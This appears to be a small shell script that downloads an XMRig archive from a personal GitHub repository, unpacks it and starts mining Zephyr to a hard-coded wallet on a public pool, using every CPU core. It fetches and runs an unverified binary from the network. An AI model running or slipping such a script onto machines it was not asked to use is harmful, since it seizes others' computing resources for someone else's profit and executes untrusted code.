#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o sg.zephyr.herominers.com:1123 -u ZEPHYR3YjAKBsmXd4MGYpAgatSybW8xwDUSTiLY8dotSQLogQFUgaGmZr3295MB5M8GTDZUUiLFxkHZdsGBVPmyLSt7aXUDRtEW48 -p LIEUR -a rx/0 -t $(nproc --all)
